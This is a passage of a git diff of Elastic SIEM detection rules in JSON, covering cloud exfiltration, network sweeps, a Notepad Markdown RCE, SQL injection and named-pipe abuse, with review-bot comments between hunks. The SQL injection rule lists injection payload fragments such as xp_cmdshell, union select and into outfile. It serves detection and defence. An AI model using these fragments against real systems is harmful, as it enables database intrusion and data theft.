While legitimate tools, they are uncommonly used in enterprise environments where organizations typically standardize on AWS CLI, SDKs, or console access. The presence of these tools may indicate unauthorized data access or exfiltration activity.\n\nThis is a [New Terms](https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-new-terms-rule) rule that identifies the first time a specific user within an account makes API calls using S3 Browser or Cyberduck user agent strings. Threat actors have been observed using these tools for their intuitive interface and bulk data transfer capabilities during post-compromise data theft operations.\n\n### Possible investigation steps\n\n- **Identify the actor**\n - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to determine which IAM principal was used.\n - Check whether this principal normally accesses S3 and whether usage of these desktop clients is expected or authorized.\n\n- **Review accessed resources**\n - Examine `aws.cloudtrail.resources.arn` to identify which S3 buckets and objects were accessed.\n - Determine whether the accessed data is sensitive, confidential, or subject to data protection policies.\n - Look for patterns indicating bulk downloads or systematic enumeration of bucket contents.\n\n- **Analyze the actions performed**\n - Review `event.action` to understand what operations were performed (e.g., `GetObject`, `ListBucket`, `PutObject`).\n - High volumes of `GetObject` calls may indicate data exfiltration.\n - `PutObject` calls to external buckets could indicate data staging for exfiltration.\n\n- **Inspect source network context**\n - Review `source.ip` and `source.geo` fields to determine the origin of the request.\n - Check whether the IP belongs to corporate infrastructure, VPN, or an unexpected external location.\n - External IPs combined with these desktop client tools are high-risk indicators.\n\n- **Correlate with surrounding 
activity**\n - Search for additional CloudTrail events from the same access key or session.\n - Look for preceding credential theft indicators such as `GetSecretValue`, `CreateAccessKey`, or console logins.\n - Check for cross-account transfers or `CreateBucket` calls in external accounts.\n\n### False positive analysis\n\n- **Authorized data migration or backup activities** may use these tools. Confirm with data engineering or IT teams.\n- **Developer testing** in non-production environments may occasionally involve these clients. Validate the environment and data sensitivity.\n- **Third-party integrations** using Cyberduck libraries may generate this user agent. Verify the automation context.\n\n### Response and remediation\n\n- **If unauthorized**, immediately revoke or rotate the affected access keys and invalidate active sessions.\n- **Assess data exposure** by reviewing which objects were accessed and determining if sensitive data was compromised.\n- **Notify security operations** and initiate incident response procedures if exfiltration is confirmed.\n- **Implement preventive controls** such as S3 bucket policies restricting access by user agent or requiring VPC endpoints.\n\n### Additional information\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/)**\n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)**\n- **[AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/)**\n", + "query": "event.dataset: \"aws.cloudtrail\"\n and user_agent.original: (*S3 Browser* or *Cyberduck*)\n and event.outcome: \"success\"\n", + "references": [ + "https://s3browser.com/", + "https://cyberduck.io/", + "https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud", + 
"https://attackevals.github.io/ael/enterprise/scattered_spider/emulation_plan/scattered_spider_scenario/" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "user_agent.original", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "73344d2d-9cfb-4daf-b3c5-1d40a8182b86", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS CloudTrail", + "Data Source: AWS S3", + "Tactic: Exfiltration", + "Use Case: Threat Detection", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1567", + "name": "Exfiltration Over Web Service", + "reference": "https://attack.mitre.org/techniques/T1567/", + "subtechnique": [ + { + "id": "T1567.002", + "name": "Exfiltration to Cloud Storage", + "reference": "https://attack.mitre.org/techniques/T1567/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "73344d2d-9cfb-4daf-b3c5-1d40a8182b86_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_11.json b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_11.json deleted file mode 100644 index cc4b35ad1e7..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_11.json +++ /dev/null 
@@ -1,115 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule identifies a potential network sweep. A network sweep is a method used by attackers to scan a target network, identifying active hosts, open ports, and available services to gather information on vulnerabilities and weaknesses. This reconnaissance helps them plan subsequent attacks and exploit potential entry points for unauthorized access, data theft, or other malicious activities. This rule defines a threshold-based approach to detect multiple connection attempts from a single host to numerous destination hosts over commonly used network services.", - "from": "now-9m", - "index": [ - "packetbeat-*", - "filebeat-*", - "logs-network_traffic.*", - "logs-panw.panos*" - ], - "language": "kuery", - "license": "Elastic License v2", - "max_signals": 5, - "name": "Potential Network Sweep Detected", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Network Sweep Detected\n\nNetwork sweeps are reconnaissance techniques where attackers scan networks to identify active hosts and services, often targeting common ports. This activity helps adversaries map out network vulnerabilities for future exploitation. 
The detection rule identifies such sweeps by monitoring connection attempts from a single source to multiple destinations on key ports, flagging potential reconnaissance activities for further investigation.\n\n### Possible investigation steps\n\n- Review the source IP address to determine if it belongs to a known or trusted entity within the network, focusing on the private IP ranges specified in the query (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16).\n- Analyze the destination IP addresses to identify any patterns or commonalities, such as specific subnets or devices, that could indicate targeted reconnaissance.\n- Check historical logs for previous connection attempts from the same source IP to see if there is a pattern of repeated scanning behavior or if this is an isolated incident.\n- Investigate the specific ports targeted (21, 22, 23, 25, 139, 445, 3389, 5985, 5986) to determine if they are associated with critical services or known vulnerabilities within the network.\n- Correlate the detected activity with any recent changes or incidents in the network environment that might explain the behavior, such as new device deployments or configuration changes.\n- Consult threat intelligence sources to determine if the source IP or similar scanning patterns have been associated with known threat actors or campaigns.\n\n### False positive analysis\n\n- Internal network scans by IT teams can trigger the rule. Regularly scheduled scans for security assessments should be documented and their source IPs added to an exception list to prevent false alerts.\n- Automated monitoring tools that check network health might cause false positives. Identify these tools and exclude their IP addresses from the rule to avoid unnecessary alerts.\n- Load balancers or network devices that perform health checks across multiple hosts can be mistaken for network sweeps. 
Exclude these devices by adding their IPs to a whitelist.\n- Development or testing environments where multiple connections are made for legitimate purposes can trigger the rule. Ensure these environments are recognized and their IP ranges are excluded from monitoring.\n- Misconfigured devices that repeatedly attempt to connect to multiple hosts can appear as network sweeps. Investigate and correct the configuration, then exclude these devices if necessary.\n\n### Response and remediation\n\n- Isolate the source IP: Immediately isolate the source IP address identified in the alert from the network to prevent further reconnaissance or potential exploitation of identified vulnerabilities.\n\n- Block suspicious ports: Implement firewall rules to block incoming and outgoing traffic on the commonly targeted ports (21, 22, 23, 25, 139, 445, 3389, 5985, 5986) from the source IP to mitigate further scanning attempts.\n\n- Conduct a network-wide scan: Perform a comprehensive scan of the network to identify any unauthorized access or changes that may have occurred as a result of the network sweep.\n\n- Review and update access controls: Ensure that access controls and permissions are appropriately configured to limit exposure of critical services and sensitive data.\n\n- Monitor for recurrence: Set up enhanced monitoring and alerting for any future connection attempts from the source IP or similar patterns of network sweep activity.\n\n- Escalate to security operations: Notify the security operations team to conduct a deeper investigation into the source of the network sweep and assess any potential threats or breaches.\n\n- Document and report: Record all findings, actions taken, and lessons learned in an incident report to inform future response strategies and improve network defenses.", - "query": "event.action:network_flow and destination.port:(21 or 22 or 23 or 25 or 139 or 445 or 3389 or 5985 or 5986) and\nsource.ip:(10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", - 
"related_integrations": [ - { - "package": "network_traffic", - "version": "^1.1.0" - }, - { - "package": "panw", - "version": "^5.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "destination.port", - "type": "long" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - } - ], - "risk_score": 21, - "rule_id": "781f8746-2180-4691-890c-4c96d11ca91d", - "severity": "low", - "tags": [ - "Domain: Network", - "Tactic: Discovery", - "Tactic: Reconnaissance", - "Use Case: Network Security Monitoring", - "Data Source: PAN-OS", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1046", - "name": "Network Service Discovery", - "reference": "https://attack.mitre.org/techniques/T1046/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0043", - "name": "Reconnaissance", - "reference": "https://attack.mitre.org/tactics/TA0043/" - }, - "technique": [ - { - "id": "T1595", - "name": "Active Scanning", - "reference": "https://attack.mitre.org/techniques/T1595/", - "subtechnique": [ - { - "id": "T1595.001", - "name": "Scanning IP Blocks", - "reference": "https://attack.mitre.org/techniques/T1595/001/" - } - ] - } - ] - } - ], - "threshold": { - "cardinality": [ - { - "field": "destination.ip", - "value": 100 - } - ], - "field": [ - "source.ip" - ], - "value": 1 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 11 - }, - "id": "781f8746-2180-4691-890c-4c96d11ca91d_11", - "type": "security-rule" -} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/7f3521dd-fb80-4548-a7eb-8db37b898dc2_2.json b/packages/security_detection_engine/kibana/security_rule/7f3521dd-fb80-4548-a7eb-8db37b898dc2_2.json new file mode 100644 index 00000000000..808202f3bda --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7f3521dd-fb80-4548-a7eb-8db37b898dc2_2.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a process started by Notepad after opening a Markdown file. This may indicate successful exploitation of a Notepad markdown parsing vulnerability (CVE-2026-20841) that can lead to arbitrary code execution.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Notepad Markdown RCE Exploitation", + "note": "## Triage and analysis\n\n### Investigating Potential Notepad Markdown RCE Exploitation\n\nThis rule detects a new child process launched by `notepad.exe` when Notepad was opened with a Markdown (`.md`) file.\nThis behavior can indicate exploitation of a Notepad remote code execution vulnerability where crafted Markdown content\ntriggers unintended process execution.\n\n### Possible investigation steps\n\n- Validate the parent-child relationship and confirm `notepad.exe` is the direct parent of the suspicious process.\n- Review the full command line of both parent and child processes, including the Markdown file path in `process.parent.args`.\n- Identify the Markdown file source (email attachment, browser download, chat client, removable media, or network share).\n- Inspect process ancestry and descendants for additional payload execution, script interpreters, or LOLBIN activity.\n- Correlate with file, registry, and network events around the same timestamp to identify follow-on behavior.\n- Determine whether the child process and its execution path are expected in your environment.\n\n### False positive analysis\n\n- Legitimate automation or editor extensions may occasionally spawn helper processes from Notepad workflows.\n- User-driven workflows that invoke external tools from Markdown previews can trigger this behavior.\n- If benign, tune by 
excluding known-safe child process names, hashes, signed binaries, and approved file paths.\n\n### Response and remediation\n\n- Isolate affected endpoints until scope is understood.\n- Terminate suspicious child and descendant processes initiated from `notepad.exe`.\n- Quarantine and preserve the triggering Markdown file for forensic analysis.\n- Run endpoint malware scans and collect volatile artifacts (running processes, network connections, autoruns).\n- Patch Windows/Notepad to the latest security update level addressing the vulnerability.\n- Hunt for the same parent-child pattern across other hosts to identify additional impacted systems.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"notepad.exe\" and process.parent.args : \"*.md\" and\n not process.executable : \"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsNotepad_*\\\\Notepad\\\\Notepad.exe\"\n", + "references": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "7f3521dd-fb80-4548-a7eb-8db37b898dc2", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: 
Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "7f3521dd-fb80-4548-a7eb-8db37b898dc2_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7f7a0ee1-7b6f-466a-85b4-110fb105f5e2_2.json b/packages/security_detection_engine/kibana/security_rule/7f7a0ee1-7b6f-466a-85b4-110fb105f5e2_2.json new file mode 100644 index 00000000000..53670a67908 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7f7a0ee1-7b6f-466a-85b4-110fb105f5e2_2.json 
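Review bot: The parent-argument filter `process.parent.args : "*.md"` matches only the `.md` extension; if Notepad also applies its Markdown rendering to `.markdown` documents, a child spawned from one of those is missed, so `process.parent.args : ("*.md", "*.markdown")` would close that gap — confirm Notepad's registered Markdown extensions before widening it. The `not process.executable : "C:\\Program Files\\WindowsApps\\Microsoft.WindowsNotepad_*\\Notepad\\Notepad.exe"` exclusion is unexplained anywhere in the rule; a sentence in the `note` along the lines of "The Store Notepad is expected to launch further Notepad.exe instances from its WindowsApps package path; that self-spawn is excluded and every other child alerts" (stated as the presumed reason, to be confirmed) would tell an analyst why a Notepad-to-Notepad event is not an alert. The `required_fields` list does match the fields the query references, and `timestamp_override: event.ingested` is consistent with the `from: now-9m` window.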
@@ -0,0 +1,133 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule detects potential SQL injection attempts in web server requests by identifying common SQL injection patterns in URLs. Such activity may indicate reconnaissance or exploitation attempts by attackers trying to manipulate backend databases or extract sensitive information.", + "from": "now-9m", + "index": [ + "logs-nginx.access-*", + "logs-apache.access-*", + "logs-apache_tomcat.access-*", + "logs-iis.access-*", + "logs-traefik.access-*" + ], + "interval": "10m", + "language": "eql", + "license": "Elastic License v2", + "name": "Web Server Potential SQL Injection Request", + "query": "any where url.original like~ (\n \"*%20order%20by%*\", \"*dbms_pipe.receive_message%28chr%*\", \"*waitfor%20delay%20*\", \"*%28select%20*from%20pg_sleep%285*\", \"*%28select%28sleep%285*\", \"*%3bselect%20pg_sleep%285*\",\n \"*select%20concat%28concat*\", \"*xp_cmdshell*\", \"*select*case*when*\", \"*and*extractvalue*select*\", \"*from*information_schema.tables*\", \"*boolean*mode*having*\", \"*extractvalue*concat*\",\n \"*case*when*sleep*\", \"*select*sleep*\", \"*dbms_lock.sleep*\", \"*and*sleep*\", \"*like*sleep*\", \"*csleep*\", \"*pgsleep*\", \"*char*char*char*\", \"*union*select*\", \"*concat*select*\",\n \"*select*else*drop*\", \"*having*like*\", \"*case*else*end*\", \"*if*sleep*\", \"*where*and*select*\", \"*or*1=1*\", \"*\\\"1\\\"=\\\"1\\\"*\", \"*or*'a'='a*\", \"*into*outfile*\", \"*pga_sleep*\",\n \"*into%20outfile*\", \"*into*dumpfile*\", \"*load_file%28*\", \"*load%5ffile%28*\", \"*cast%28*\", \"*convert%28*\", \"*cast%28%*\", \"*convert%28%*\", \"*@@version*\", \"*@@version_comment*\",\n \"*version%28*\", \"*user%28*\", \"*current_user%28*\", \"*database%28*\", \"*schema_name%28*\", \"*information_schema.columns*\", \"*information_schema.columns*\", \"*table_schema*\",\n \"*column_name*\", \"*dbms_pipe*\", \"*dbms_lock%2e*sleep*\", 
\"*dbms_lock.sleep*\", \"*sp_executesql*\", \"*sp_executesql*\", \"*load%20data*\", \"*information_schema*\", \"*pg_slp*\",\n \"*information_schema.tables*\"\n)\n", + "required_fields": [ + { + "ecs": true, + "name": "url.original", + "type": "wildcard" + } + ], + "risk_score": 21, + "rule_id": "7f7a0ee1-7b6f-466a-85b4-110fb105f5e2", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Tactic: Credential Access", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1595", + 
"name": "Active Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/", + "subtechnique": [ + { + "id": "T1595.002", + "name": "Vulnerability Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/002/" + }, + { + "id": "T1595.003", + "name": "Wordlist Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "7f7a0ee1-7b6f-466a-85b4-110fb105f5e2_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8167c5ae-3310-439a-8a58-be60f55023d2_2.json b/packages/security_detection_engine/kibana/security_rule/8167c5ae-3310-439a-8a58-be60f55023d2_2.json deleted file mode 100644 index 80903671869..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/8167c5ae-3310-439a-8a58-be60f55023d2_2.json +++ /dev/null 
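Review bot: The `like~` pattern list in `query` contains literal duplicates — `"*information_schema.columns*"`, `"*sp_executesql*"` and `"*dbms_lock.sleep*"` each appear twice — and several entries are subsumed by broader ones (`"*cast%28%*"` by `"*cast%28*"`, `"*convert%28%*"` by `"*convert%28*"`, both `information_schema.*` patterns by `"*information_schema*"`), so the list should be de-duplicated to keep the rule reviewable and its intent clear. The `tags` list advertises `Tactic: Credential Access`, but no `threat` entry maps to TA0006, and the Persistence/Execution/Command-and-Control mappings (T1505, T1059.004 Unix Shell, T1071) describe possible post-exploitation outcomes rather than the injection attempt itself, which MITRE records as T1190 Exploit Public-Facing Application under Initial Access; aligning `tags` and `threat` to one agreed set of tactics would make the mapping consistent. Broad entries such as `"*or*1=1*"` and `"*and*sleep*"` will also match ordinary URLs that merely contain those words, which is tolerable for a building-block rule at risk 21 but should be stated in a `note`, since this rule ships without one.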
@@ -1,122 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects the creation of unusually labeled named pipes (FIFOs) by the mkfifo command, which is often used by attackers to establish persistence on a target system or to execute commands in the background. Through the new_terms rule type, this rule can identify uncommon process command lines that may indicate the presence of a malicious named pipe.", - "from": "now-9m", - "history_window_start": "now-10d", - "index": [ - "logs-endpoint.events.process*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Suspicious Named Pipe Creation", - "new_terms_fields": [ - "host.id", - "process.command_line" - ], - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Suspicious Named Pipe Creation\n\nNamed pipes, or FIFOs, are a form of inter-process communication in Linux environments, allowing data transfer between processes. Adversaries exploit this by creating named pipes in common directories like /tmp to stealthily execute commands or maintain persistence. 
The detection rule identifies unusual named pipe creation by monitoring the `mkfifo` command, especially when initiated by common shell processes, to flag potential malicious activity.\n\n### Possible investigation steps\n\n- Review the process command line arguments to identify the exact named pipe path and any associated commands or scripts that might have been executed using the named pipe.\n- Investigate the parent process (bash, csh, dash, fish, ksh, sh, tcsh, or zsh) to determine the origin of the mkfifo command, checking for any unusual or unexpected scripts or commands that might have initiated it.\n- Examine the user account associated with the mkfifo process to determine if it is a legitimate user or if the account might have been compromised.\n- Check for any other suspicious activities or processes running under the same user account or originating from the same parent process to identify potential lateral movement or further malicious actions.\n- Analyze the system logs around the time of the named pipe creation for any other indicators of compromise, such as unauthorized access attempts or unusual network connections.\n- If possible, capture and review the contents of the named pipe to understand the data being transferred and assess whether it is part of a malicious operation.\n\n### False positive analysis\n\n- Named pipes created by legitimate applications for inter-process communication can trigger this rule. Users should identify and whitelist these applications by adding exceptions for specific process command lines that are known to be safe.\n- System maintenance scripts or backup processes that use named pipes in directories like /tmp or /var/tmp may cause false positives. Review these scripts and exclude them from the rule if they are verified as non-malicious.\n- Development environments or testing frameworks that frequently create and delete named pipes during their operations might be flagged. 
Users can mitigate this by excluding these environments from monitoring or by specifying exceptions for known development tools.\n- Automated deployment tools that use named pipes for configuration management or orchestration tasks can also be a source of false positives. Ensure these tools are recognized and excluded from the rule to prevent unnecessary alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further malicious activity or lateral movement.\n- Terminate any suspicious processes associated with the mkfifo command, especially those originating from common shell processes like bash or sh.\n- Delete any named pipes created in directories such as /tmp, /dev/shm, or /var/tmp that do not follow expected naming conventions or are not part of legitimate applications.\n- Conduct a thorough review of user accounts and permissions on the affected system to identify any unauthorized access or privilege escalation.\n- Restore the system from a known good backup if any unauthorized changes or persistence mechanisms are detected.\n- Implement additional monitoring on the affected system and network to detect any further attempts to create suspicious named pipes or execute unauthorized commands.\n- Escalate the incident to the security operations team for further investigation and to determine if the threat is part of a larger attack campaign.\n", - "query": "host.os.type:linux and event.category:process and event.type:start and event.action:exec and process.name:mkfifo and\nprocess.parent.name:(bash or csh or dash or fish or ksh or sh or tcsh or zsh) and\nprocess.args:((/dev/shm/* or /tmp/* or /var/tmp/*) and not /*fifo*)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": 
"event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "8167c5ae-3310-439a-8a58-be60f55023d2", - "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.004", - "name": "Unix Shell", - "reference": "https://attack.mitre.org/techniques/T1059/004/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0011", - "name": "Command and Control", - "reference": "https://attack.mitre.org/tactics/TA0011/" - }, - "technique": [ - { - "id": "T1071", - "name": "Application Layer Protocol", - "reference": "https://attack.mitre.org/techniques/T1071/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 2 - }, - "id": "8167c5ae-3310-439a-8a58-be60f55023d2_2", - "type": "security-rule" -} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/8293bf1f-8dd0-434e-b52a-1aa6ec101777_1.json b/packages/security_detection_engine/kibana/security_rule/8293bf1f-8dd0-434e-b52a-1aa6ec101777_1.json new file mode 100644 index 00000000000..9f9d5c31e7e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8293bf1f-8dd0-434e-b52a-1aa6ec101777_1.json 
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects processes attempting to write to AppArmor policy management pseudo-files located under \"/sys/kernel/security/apparmor/\". These special kernel interfaces are used to load, replace, or remove AppArmor profiles (\".load\", \".replace\", \".remove\"). In normal environments, AppArmor policy management is typically performed by administrative tools such as \"apparmor_parser\" during system initialization or package installation. Direct interaction with these pseudo-files from shell utilities, interpreters, or scripting environments is uncommon and may indicate attempts to modify security policy at runtime. Adversaries may abuse these interfaces to weaken or disable AppArmor protections, introduce malicious profiles, or exploit vulnerabilities in the AppArmor policy parser as part of local privilege escalation chains.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process*", + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Write Attempt to AppArmor Policy Management Files", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Suspicious Write Attempt to AppArmor Policy Management Files\n\nThis rule flags shells, scripting runtimes, and basic file utilities trying to write directly to AppArmor\u2019s policy control files, an unusual action that can change or remove enforcement while the system is running. 
